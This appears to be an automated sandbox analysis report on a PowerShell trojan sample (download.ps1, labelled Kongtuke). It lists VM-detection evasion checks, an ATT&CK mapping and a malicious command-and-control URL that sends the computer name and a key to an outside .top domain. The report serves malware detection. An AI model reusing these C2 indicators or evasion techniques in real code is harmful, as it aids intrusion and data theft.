Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5384Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4525Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2217128894.00000111E2865000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2217128894.00000111E2865000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2217128894.00000111E2865000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps111%VirustotalBrowse
download.ps116%ReversingLabsScript-PowerShell.Trojan.Kongtuke

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=5270%Avira URL Cloudsafe
http://crl.mf-0%Avira URL Cloudsafe
http://gajaechkfhfghal.top100%Avira URL Cloudmalware
http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.68
truefalse
    		high
    gajaechkfhfghal.top
    		45.61.136.138
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527true
      • Avira URL Cloud: malware
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.microsoftpowershell.exe, 00000000.00000002.2264488304.00000111FA0D0000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/logos/doodles/2024/seasonal-holidays-202powershell.exe, 00000000.00000002.2217128894.00000111E44A0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schema.org/WebPagepowershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://0.google.com/powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/logos/doodles/2024/seasonal-holidays-2024powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.google.compowershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://apis.google.compowershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2217128894.00000111E1FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
